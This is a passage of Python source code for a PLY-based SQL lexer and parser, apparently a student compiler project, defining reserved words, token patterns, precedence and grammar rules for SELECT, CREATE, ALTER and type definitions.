from NodoAST import NodoAST
import re
# GLOBAL VARIABLES
counter_lexical_error = 1
counter_syntactic_error = 1
reporte_gramatical = []
# LIST OF RESERVED WORDS
palabras_reservadas = {
'select' : 'SELECT',
'where' : 'WHERE',
'limit' : 'LIMIT',
'group' : 'GROUP',
'by' : 'BY',
'having' : 'HAVING',
'order' : 'ORDER',
'asc' : 'ASC',
'desc' : 'DESC',
'offset' : 'OFFSET',
'nulls' : 'NULLS',
'last' : 'LAST',
'first' : 'FIRST',
'as' : 'AS',
'is' : 'IS',
'and' : 'AND',
'or' : 'OR',
'true' : 'TRUE',
'false' : 'FALSE',
'not' : 'NOT',
'distinct' : 'DISTINCT',
'count' : 'COUNT',
'avg' : 'AVG',
'sum' : 'SUM',
'max' : 'MAX',
'min' : 'MIN',
'greatest' : 'GREATEST',
'least' : 'LEAST',
'unknown' : 'UNKNOWN',
'between' : 'BETWEEN',
'simmetric' : 'SIMMETRIC',
'null' : 'NULL',
'union' : 'UNION',
'all' : 'ALL',
'intersect' : 'INTERSECT',
'except' : 'EXCEPT',
'case' : 'CASE',
'when' : 'WHEN',
'end' : 'END',
'then' : 'THEN',
'else' : 'ELSE',
'pi' : 'PI',
'in' : 'IN',
'any' : 'ANY',
'some' : 'SOME',
'like' : 'LIKE',
'substring' : 'SUBSTRING',
'substr' : 'SUBSTR',
'trim' : 'TRIM',
'leading' : 'LEADING',
'trailing' : 'TRAILING',
'both' : 'BOTH',
'encode' : 'ENCODE',
'decode' : 'DECODE',
'abs' : 'ABS',
'cbrt' : 'CBRT',
'ceil' : 'CEIL',
'ceiling' : 'CEILING',
'degrees' : 'DEGREES',
'div' : 'DIV',
'factorial' : 'FACTORIAL',
'floor' : 'FLOOR',
'gcd' : 'GCD',
'ln' : 'LN',
'log' : 'LOG',
'mod' : 'MOD',
'power' : 'POWER',
'radians' : 'RADIANS',
'round' : 'ROUND',
'sign' : 'SIGN',
'sqrt' : 'SQRT',
'width_bucket' : 'WIDTH_BUCKET',
'trunc' : 'TRUNC',
'random' : 'RANDOM',
'exp' : 'FEXP',
'extract' : 'EXTRACT',
'now' : 'NOW',
'hour' : 'HOUR',
'minute' : 'MINUTE',
'second' : 'SECOND',
'year' : 'YEAR',
'month' : 'MONTH',
'day' : 'DAY',
'timestamp' : 'TIMESTAMP',
'interval' : 'INTERVAL',
'date_part' : 'DATE_PART',
'current_date' : 'CURRENT_DATE',
'current_time' : 'CURRENT_TIME',
'length' : 'LENGTH',
'sha256' : 'SHA256',
'date' : 'DATE',
'integer' : 'INTEGER',
'convert' : 'CONVERT',
'create' : 'CREATE',
'replace' : 'REPLACE',
'database' : 'DATABASE',
'databases' : 'DATABASES',
'if' : 'IF',
'exists' : 'EXISTS',
'owner' : 'OWNER',
'mode' : 'MODE',
'alter' : 'ALTER',
'drop' : 'DROP',
'show' : 'SHOW',
'rename' : 'RENAME',
'to' : 'TO',
'insert' : 'INSERT',
'update' : 'UPDATE',
'set' : 'SET',
'into' : 'INTO',
'values' : 'VALUES',
'table' : 'TABLE',
'from' : 'FROM',
'delete' : 'DELETE',
'acos' : 'ACOS',
'acosd' : 'ACOSD',
'asin' : 'ASIN',
'asind' : 'ASIND',
'atan' : 'ATAN',
'atand' : 'ATAND',
'atan2' : 'ATAN2',
'atan2d' : 'ATAN2D',
'cos' : 'COS',
'cosd' : 'COSD',
'cot' : 'COT',
'cotd' : 'COTD',
'sin' : 'SIN',
'sind' : 'SIND',
'tan' : 'TAN',
'tand' : 'TAND',
'sinh' : 'SINH',
'cosh' : 'COSH',
'tanh' : 'TANH',
'asinh' : 'ASINH',
'acosh' : 'ACOSH',
'atanh' : 'ATANH',
'get_byte' : 'GETBYTE',
'set_byte' : 'SETBYTE',
'inherits' : 'INHERITS',
'primary' : 'PRIMARY',
'key' : 'KEY',
'foreign' : 'FOREIGN',
'references' : 'REFERENCES',
'constraint' : 'CONSTRAINT',
'check' : 'CHECK',
'unique' : 'UNIQUE',
'default' : 'DEFAULT',
'smallint' : 'SMALLINT',
'bigint' : 'BIGINT',
'numeric' : 'NUMERIC',
'real' : 'REAL',
'double' : 'DOUBLE',
'money' : 'MONEY',
'character' : 'CHARACTER',
'varchar' : 'VARCHAR',
'char' : 'CHAR',
'text' : 'TEXT',
'time' : 'TIME',
'boolean' : 'BOOLEAN',
'varying' : 'VARYING',
'type' : 'TYPE',
'enum' : 'ENUM',
'add' : 'ADD',
'column' : 'COLUMN',
'use' : 'USE',
'md5' : 'MD5',
'decimal' : 'DECIMAL',
'current_user' : 'CURRENT_USER',
'session_user' : 'SESSION_USER'
}
# LIST OF SYMBOLS AND TOKENS
tokens = [
'COMA',
'ID',
'PABRE',
'PCIERRA',
'MAS',
'MENOS',
'POR',
'DIVIDIDO',
'MODULO',
'EXP',
'PUNTO',
'IGUAL',
'DIF',
'DIF1',
'MENOR',
'MENORIGUAL',
'MAYOR',
'MAYORIGUAL',
'NUMERO',
'DECIMALN',
'CADENA',
'PCOMA',
'IDALIAS',
'raizCuadrada',
'raizCubica',
'BAnd',
'BOr',
'BXor',
'BNot',
'DesplazaI',
'DesplazaD'
] + list(palabras_reservadas.values())
# REGULAR EXPRESSIONS FOR TOKENS
t_COMA = r','
t_PABRE = r'\('
t_PCIERRA = r'\)'
t_MAS = r'\+'
t_MENOS = r'-'
t_POR = r'\*'
t_DIVIDIDO = r'/'
t_MODULO = r'\%'
t_EXP = r'\^'
t_PUNTO = r'\.'
t_IGUAL = r'\='
t_DIF = r'<>'
t_DIF1 = r'!='
t_MENOR = r'<'
t_MENORIGUAL = r'<='
t_MAYOR = r'>'
t_MAYORIGUAL = r'>='
t_PCOMA = r';'
t_raizCuadrada = r'\|\/'
t_raizCubica = r'\|\|\/'
t_BAnd = r'&'
t_BOr = r'\|'
t_BXor = r'#'
t_BNot = r'~'
t_DesplazaI = r'<<'
t_DesplazaD = r'>>'
# IGNORED TOKENS
t_ignore = " \t"
def t_DECIMALN(t):
r'\d+\.\d+'
try:
t.value = float(t.value)
except ValueError:
print("Float value too large %d", t.value)
t.value = 0
return t
def t_NUMERO(t):
r'\d+'
try:
t.value = int(t.value)
except ValueError:
print("Integer value too large %d", t.value)
t.value = 0
return t
def t_ID(t):
r'[a-zA-Z_][a-zA-Z_0-9]*'
t.type = palabras_reservadas.get(t.value.lower(),'ID')
return t
def t_IDALIAS(t):
r'\".*?\"'
t.value = t.value[1:-1]
return t
def t_CADENA(t):
r'\'.*?\''
t.value = t.value[1:-1]
return t
def t_COMENTARIO_MULTILINEA(t):
r'/\*(.|\n)*?\*/'
t.lexer.lineno += t.value.count('\n')
def t_COMENTARIO_SIMPLE(t):
r'--.*\n'
t.lexer.lineno += 1
# Function to count lines in input
def t_newline(t):
r'\n+'
t.lexer.lineno += t.value.count("\n")
# Function to get column of a token
def get_column(p_input, p_token):
line = p_input.rfind('\n', 0, p_token.lexpos) + 1
column = (p_token.lexpos - line) + 1
return column
# Function to print LEXICAL ERRORS
def t_error(t):
global counter_lexical_error
print("CARACTER ILEGAL '%s'" % t.value[0])
err = open("reports/error_lexical.txt", "a+")
txt = '<tr><td>' + str(counter_lexical_error) + '</td>'
txt += '<td>' + str(t.value[0]) + '</td>'
txt += '<td>' + 'Caracter ingresado no admitido.' + '</td>'
txt += '<td>' + str(t.lexer.lineno) + '</td>'
txt += '<td>' + str(get_column(t.lexer.lexdata, t)) + '</td><tr>\n'
err.write(txt)
err.close()
counter_lexical_error += 1
t.lexer.skip(1)
# BUILD THE LEXER
lexer = lex.lex(reflags=re.IGNORECASE)
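# Illustrative helper (added as a sketch; the sample query below is hypothetical):
# feed raw SQL text to the lexer built above and collect the (type, value) pairs it
# produces, which is handy when debugging new tokens or reserved words.
def _debug_tokenize(sql_text):
    lexer.input(sql_text)
    return [(tok.type, tok.value) for tok in iter(lexer.token, None)]

# Example:
#   _debug_tokenize("SELECT nombre FROM persona WHERE edad >= 18;")
#   -> [('SELECT', 'SELECT'), ('ID', 'nombre'), ('FROM', 'FROM'), ('ID', 'persona'),
#       ('WHERE', 'WHERE'), ('ID', 'edad'), ('MAYORIGUAL', '>='), ('NUMERO', 18), ('PCOMA', ';')]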
# OPERATOR PRECEDENCE
precedence = (
('left', 'OR'),
('left', 'AND'),
('right', 'NOT'),
('nonassoc', 'IS', 'NULL'),
('left', 'MENORIGUAL', 'MAYORIGUAL', 'IGUAL', 'DIF', 'DIF1', 'MENOR', 'MAYOR'),
('nonassoc', 'BETWEEN', 'NOTB'),
('left', 'MAS', 'MENOS'),
('left', 'POR', 'DIVIDIDO', 'MODULO'),
('left', 'EXP'),
('right', 'UMENOS', 'UMAS')
)
# GRAMMAR DEFINITION
def p_init(t):
"""
init : INSTRUCCIONES
"""
t[0] = t[1]
def p_instrucciones1(t):
"""
INSTRUCCIONES : INSTRUCCIONES INSTRUCCION
"""
global reporte_gramatical
reporte_gramatical.append("<INSTRUCCIONES> ::= <INSTRUCCIONES> <INSTRUCCION>")
val = t[1].getInstruccion()
val.append(t[2].getInstruccion())
ret = Retorno(val, NodoAST("INST"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_instrucciones2(t):
"""
INSTRUCCIONES : INSTRUCCION
"""
global reporte_gramatical
reporte_gramatical.append("<INSTRUCCIONES> ::= <INSTRUCCION>")
val = [t[1].getInstruccion()]
ret = Retorno(val, NodoAST("INST"))
ret.getNodo().setHijo(t[1].getNodo())
t[0] = ret
def p_instruccion1(t):
"""
INSTRUCCION : I_SELECT COMPLEMENTOSELECT
"""
global reporte_gramatical
reporte_gramatical.append("<INSTRUCCION> ::= <I_SELECT> <COMPLEMENTOSELECT>")
if t[2] is None:
t[0] = t[1]
else:
if isinstance(t[2].getInstruccion(), ComplementoSelectUnion):
ret = Retorno(Union(t[1].getInstruccion(), t[2].getInstruccion().select), NodoAST("UNION"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
elif isinstance(t[2].getInstruccion(), ComplementoSelectUnionAll):
ret = Retorno(UnionAll(t[1].getInstruccion(), t[2].getInstruccion().select), NodoAST("UNION ALL"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
elif isinstance(t[2].getInstruccion(), ComplementoSelectIntersect):
ret = Retorno(Intersect(t[1].getInstruccion(), t[2].getInstruccion().select), NodoAST("INTERSECT"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
elif isinstance(t[2].getInstruccion(), ComplementoSelectIntersectALL):
ret = Retorno(IntersectAll(t[1].getInstruccion(), t[2].getInstruccion().select), NodoAST("INTERSECT ALL"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
elif isinstance(t[2].getInstruccion(), ComplementoSelectExcept):
ret = Retorno(Except(t[1].getInstruccion(), t[2].getInstruccion().select), NodoAST("EXCEPT"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
elif isinstance(t[2].getInstruccion(), ComplementoSelectExceptAll):
ret = Retorno(ExceptAll(t[1].getInstruccion(), t[2].getInstruccion().select), NodoAST("EXCEPT ALL"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_instruccion2(t):
"""
INSTRUCCION : I_REPLACE
| I_CTABLE
| I_CTYPE
| I_DROP
| I_INSERT
| I_ALTERDB
| I_UPDATE
| I_SHOW
| I_DELETE
| I_USE
| I_ALTERTB
"""
t[0] = t[1]
def p_use(t):
'I_USE : USE ID PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_USE> ::= "USE" "ID" ";"')
ret = Retorno(UseDatabase(t[2]),NodoAST("USE"))
ret.getNodo().setHijo(NodoAST(t[2]))
t[0] = ret
# CREATE TYPE
def p_ctype(t):
'I_CTYPE : CREATE TYPE ID AS ENUM PABRE I_LVALUES PCIERRA PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_CTYPE> ::= "CREATE" "TYPE" "ID" "AS" "ENUM" "(" <I_LVALUES> ")" ";"')
ret = Retorno(CreateType(t[3],t[7].getInstruccion()),NodoAST("CREATE TYPE"))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(t[7].getNodo())
t[0] = ret
def p_lcad1(t):
'I_LVALUES : I_LVALUES COMA CONDI'
global reporte_gramatical
reporte_gramatical.append('<I_LVALUES> ::= <I_LVALUES> "," <CONDI>')
val = t[1].getInstruccion()
val.append(t[3].getInstruccion())
ret = Retorno(val,NodoAST("VALOR"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_lcad2(t):
'I_LVALUES : CONDI'
global reporte_gramatical
reporte_gramatical.append('<I_LVALUES> ::= <CONDI>')
val = [t[1].getInstruccion()]
ret = Retorno(val,NodoAST("VALOR"))
ret.getNodo().setHijo(t[1].getNodo())
t[0] = ret
def p_Ilcad2(t):
'CONDI : CONDICION'
global reporte_gramatical
reporte_gramatical.append('<CONDI> ::= <CONDICION>')
t[0] = t[1]
# END CREATE TYPE
def p_ctable(t):
"""
I_CTABLE : TABLE ID PABRE I_LTATRIBUTOS PCIERRA I_INHERITS
"""
    # CTABLE INSTRUCTION
def p_inherits(t):
'I_INHERITS : INHERITS PABRE ID PCIERRA PCOMA'
def p_inherits1(t):
'I_INHERITS : PCOMA'
def p_tAtributos(t):
'I_LTATRIBUTOS : I_LTATRIBUTOS COMA I_TATRIBUTOS'
def p_tAtributos1(t):
'I_LTATRIBUTOS : I_TATRIBUTOS'
def p_atributosT(t):
'I_TATRIBUTOS : ID I_TIPO LI_LLAVES'
def p_atributosTipo(t):
'I_TATRIBUTOS : ID I_TIPO'
def p_atributosT1(t):
'I_TATRIBUTOS : PCONSTRAINT'
def p_PConstraint(t):
'PCONSTRAINT : CONSTRAINT ID TIPO_CONSTRAINT'
def p_PConstrainTipo(t):
'PCONSTRAINT : TIPO_CONSTRAINT'
def p_TipoConstraintUnique(t):
'TIPO_CONSTRAINT : UNIQUE PABRE I_LIDS PCIERRA'
def p_TipoConstraintPrimaryKey(t):
'TIPO_CONSTRAINT : PRIMARY KEY PABRE I_LIDS PCIERRA'
def p_ipoConstraintCheck(t):
'TIPO_CONSTRAINT : CHECK CONDICION'
def p_ipoConstraintForeignKey(t):
'TIPO_CONSTRAINT : FOREIGN KEY PABRE I_LIDS PCIERRA REFERENCES ID PABRE I_LIDS PCIERRA'
def p_Lllave(t):
'LI_LLAVES : LI_LLAVES I_LLAVES'
def p_Lllave1(t):
'LI_LLAVES : I_LLAVES'
def p_cRef(t):
'I_CREFERENCE : I_CREFERENCE COMA ID'
def p_cRef2(t):
'I_CREFERENCE : ID'
def p_llave(t):
'I_LLAVES : PRIMARY KEY'
def p_llave2(t):
'I_LLAVES : REFERENCES ID PABRE I_CREFERENCE PCIERRA'
def p_llave3(t):
'I_LLAVES : DEFAULT ID'
def p_llave4(t):
'I_LLAVES : NULL'
def p_llave5(t):
'I_LLAVES : NOT NULL'
def p_llave6(t):
'I_LLAVES : CONSTRAINT ID'
def p_llave7(t):
'I_LLAVES : UNIQUE PABRE I_LIDS PCIERRA'
def p_llave9(t):
'I_LLAVES : UNIQUE'
def p_llave10(t):
'I_LLAVES : CHECK PABRE I_LIDS PCIERRA'
def p_llave11(t):
'I_LLAVES : FOREIGN KEY PABRE I_LIDS PCIERRA REFERENCES ID PABRE I_LIDS PCIERRA '
def p_lIds(t):
'I_LIDS : I_LIDS COMA CONDICION'
def p_lIds1(t):
'I_LIDS : CONDICION'
# DATA TYPES
def p_tipo(t):
'I_TIPO : SMALLINT'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "SMALLINT" ')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo2(t):
'I_TIPO : INTEGER'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "INTEGER" ')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo3(t):
'I_TIPO : BIGINT'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "BIGINT" ')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo4(t):
'I_TIPO : DECIMAL PABRE NUMERO COMA NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "DECIMAL" "(" "NUMERO" "," "NUMERO" ")" ')
ret = Retorno(TipoDato(t[3],t[5],t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(str(t[1])))
t[0] = ret
def p_tipo4_1(t):
'I_TIPO : DECIMAL'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "DECIMAL" ')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo5(t):
'I_TIPO : NUMERIC'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "NUMERIC" ')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo5_1(t):
'I_TIPO : NUMERIC PABRE NUMERO COMA NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "NUMERIC" "(" "NUMERO" "," "NUMERO" ")" ')
ret = Retorno(TipoDato(t[3],t[5],t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(str(t[3])))
t[0] = ret
def p_tipo5_2(t):
'I_TIPO : NUMERIC PABRE NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "NUMERIC" "(" "NUMERO" ")" ')
ret = Retorno(TipoDato(t[3],None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(str(t[3])))
t[0] = ret
def p_tipo6(t):
'I_TIPO : REAL'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "REAL" ')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo7(t):
'I_TIPO : DOUBLE PABRE NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "DOUBLE" "(" "NUMERO" ")" ')
ret = Retorno(TipoDato(t[3],None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(str(t[3])))
t[0] = ret
def p_tipo8(t):
'I_TIPO : MONEY'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "MONEY" ')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo9(t):
'I_TIPO : CHARACTER VARYING PABRE NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "CHARACTER" "VARYING" "(" "NUMERO" ")" ')
ret = Retorno(TipoDato(t[4],None,"CHARACTER VARYING"),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST("CHARACTER VARYING"))
ret.getNodo().setHijo(NodoAST(str(t[4])))
t[0] = ret
def p_tipo9_1(t):
'I_TIPO : CHARACTER PABRE NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "CHARACTER" "(" "NUMERO" ")" ')
ret = Retorno(TipoDato(t[3],None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(str(t[3])))
t[0] = ret
def p_tipo11(t):
'I_TIPO : VARCHAR PABRE NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "VARCHAR" "(" "NUMERO" ")" ')
ret = Retorno(TipoDato(t[3],None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(str(t[3])))
t[0] = ret
def p_tipo22(t):
'I_TIPO : CHAR PABRE NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "CHAR" "(" "NUMERO" ")" ')
ret = Retorno(TipoDato(t[3],None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(str(t[3])))
t[0] = ret
def p_tipo33(t):
'I_TIPO : TEXT'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "TEXT"')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo44(t):
'I_TIPO : TIMESTAMP'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "TIMESTAMP"')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo44_1(t):
'I_TIPO : TIMESTAMP PABRE NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "TIMESTAMP" "(" "NUMERO" ")" ')
ret = Retorno(TipoDato(t[3],None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(str(t[3])))
t[0] = ret
def p_tipo55(t):
'I_TIPO : TIME'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "TIME"')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo55_1(t):
'I_TIPO : TIME PABRE NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "TIME" "(" "NUMERO" ")" ')
ret = Retorno(TipoDato(t[3],None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(str(t[3])))
t[0] = ret
def p_tipo66(t):
'I_TIPO : DATE'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "DATE"')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo77(t):
'I_TIPO : INTERVAL I_FIELDS'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "INTERVAL" <I_FIELDS> ')
ret = Retorno(TipoDato(None,None,t[2]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(t[2]))
t[0] = ret
def p_tipo77_1(t):
'I_TIPO : INTERVAL I_FIELDS PABRE NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "INTERVAL" <I_FIELDS> "(" "NUMERO" ")" ')
ret = Retorno(TipoDato(t[4],None,t[2]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(t[2]))
ret.getNodo().setHijo(NodoAST(str(t[4])))
t[0] = ret
def p_tipo88(t):
'I_TIPO : BOOLEAN'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "BOOLEAN" ')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo99(t):
'I_TIPO : ID'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "ID" ')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
# END DATA TYPES
def p_fields(t):
'I_FIELDS : MONTH'
global reporte_gramatical
reporte_gramatical.append('<I_FIELDS> ::= "MONTH" ')
t[0] = t[1]
def p_fields1(t):
'I_FIELDS : HOUR'
global reporte_gramatical
reporte_gramatical.append('<I_FIELDS> ::= "HOUR" ')
t[0] = t[1]
def p_fields2(t):
'I_FIELDS : MINUTE'
global reporte_gramatical
reporte_gramatical.append('<I_FIELDS> ::= "MINUTE" ')
t[0] = t[1]
def p_fields3(t):
'I_FIELDS : SECOND'
global reporte_gramatical
reporte_gramatical.append('<I_FIELDS> ::= "SECOND" ')
t[0] = t[1]
def p_fields4(t):
'I_FIELDS : YEAR'
global reporte_gramatical
reporte_gramatical.append('<I_FIELDS> ::= "YEAR" ')
t[0] = t[1]
# CREATE DATABASE
def p_Replace(t):
'I_REPLACE : CREATE OR REPLACE DATABASE IF NOT EXISTS ID COMPLEMENTO_CREATE_DATABASE PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_REPLACE> ::= "CREATE" "OR" "REPLACE" "DATABASE" "IF" "NOT" "EXISTS" "ID" <COMPLEMENTO_CREATE_DATABASE> ";"')
ret = Retorno(CreateDatabase(t[8],t[9].getInstruccion(),True,True),NodoAST("CREATE DATABASE"))
ret.getNodo().setHijo(NodoAST(t[8]))
ret.getNodo().setHijo(t[9].getNodo())
t[0] = ret
def p_Replace_1(t):
'I_REPLACE : CREATE OR REPLACE DATABASE ID COMPLEMENTO_CREATE_DATABASE PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_REPLACE> ::= "CREATE" "OR" "REPLACE" "DATABASE" "ID" <COMPLEMENTO_CREATE_DATABASE> ";"')
ret = Retorno(CreateDatabase(t[5],t[6].getInstruccion(),False,True),NodoAST("CREATE DATABASE"))
ret.getNodo().setHijo(NodoAST(t[5]))
ret.getNodo().setHijo(t[6].getNodo())
t[0] = ret
def p_Replace1(t):
'I_REPLACE : CREATE DATABASE IF NOT EXISTS ID COMPLEMENTO_CREATE_DATABASE PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_REPLACE> ::= "CREATE" "DATABASE" "IF" "NOT" "EXISTS" "ID" <COMPLEMENTO_CREATE_DATABASE> ";"')
ret = Retorno(CreateDatabase(t[6],t[7].getInstruccion(),True,False),NodoAST("CREATE DATABASE"))
ret.getNodo().setHijo(NodoAST(t[6]))
ret.getNodo().setHijo(t[7].getNodo())
t[0] = ret
def p_Replace2(t):
'I_REPLACE : CREATE DATABASE ID COMPLEMENTO_CREATE_DATABASE PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_REPLACE> ::= "CREATE" "DATABASE" "ID" <COMPLEMENTO_CREATE_DATABASE> ";"')
ret = Retorno(CreateDatabase(t[3],t[4].getInstruccion(),False,False),NodoAST("CREATE DATABASE"))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_Owmod(t):
'COMPLEMENTO_CREATE_DATABASE : OWNER IGUAL CADENA MODE IGUAL NUMERO'
global reporte_gramatical
reporte_gramatical.append('<COMPLEMENTO_CREATE_DATABASE> ::= "OWNER" "=" "CADENA" "MODE" "=" "NUMERO"')
ret = Retorno(OwnerMode(t[3],t[6]),NodoAST("VALORES"))
ret.getNodo().setHijo(NodoAST("OWNER"))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST("MODE"))
ret.getNodo().setHijo(NodoAST(str(t[6])))
t[0] = ret
def p_ModOwn(t):
'COMPLEMENTO_CREATE_DATABASE : MODE IGUAL NUMERO OWNER IGUAL CADENA '
global reporte_gramatical
reporte_gramatical.append('<COMPLEMENTO_CREATE_DATABASE> ::= "MODE" "=" "NUMERO" "OWNER" "=" "CADENA" ')
ret = Retorno(OwnerMode(t[6],t[3]),NodoAST("VALORES"))
ret.getNodo().setHijo(NodoAST("MODE"))
ret.getNodo().setHijo(NodoAST(str(t[3])))
ret.getNodo().setHijo(NodoAST("OWNER"))
ret.getNodo().setHijo(NodoAST(t[6]))
t[0] = ret
def p_Owmod1(t):
'COMPLEMENTO_CREATE_DATABASE : OWNER IGUAL CADENA'
global reporte_gramatical
reporte_gramatical.append('<COMPLEMENTO_CREATE_DATABASE> ::= "OWNER" "=" "CADENA" ')
ret = Retorno(OwnerMode(t[3],None),NodoAST("VALORES"))
ret.getNodo().setHijo(NodoAST("OWNER"))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
def p_OwmodN2(t):
'COMPLEMENTO_CREATE_DATABASE : MODE IGUAL NUMERO'
global reporte_gramatical
reporte_gramatical.append('<COMPLEMENTO_CREATE_DATABASE> ::= "MODE" "=" "NUMERO" ')
ret = Retorno(OwnerMode(None,t[3]),NodoAST("VALORES"))
ret.getNodo().setHijo(NodoAST("MODE"))
ret.getNodo().setHijo(NodoAST(str(t[3])))
t[0] = ret
# END CREATE DATABASE
# ALTER DATABASE
def p_tAlter(t):
'I_ALTERDB : ALTER DATABASE ID P_OPERACION_ALTERDB PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_ALTERDB> ::= "ALTER" "DATABASE" "ID" <P_OPERACION_ALTERDB> ";" ')
ret = Retorno(AlterDB(t[3],t[4].getInstruccion()),NodoAST("ALTER DATABASE"))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_tAlterOpDB(t):
'P_OPERACION_ALTERDB : OWNER TO P_TIPOS_OWNER'
global reporte_gramatical
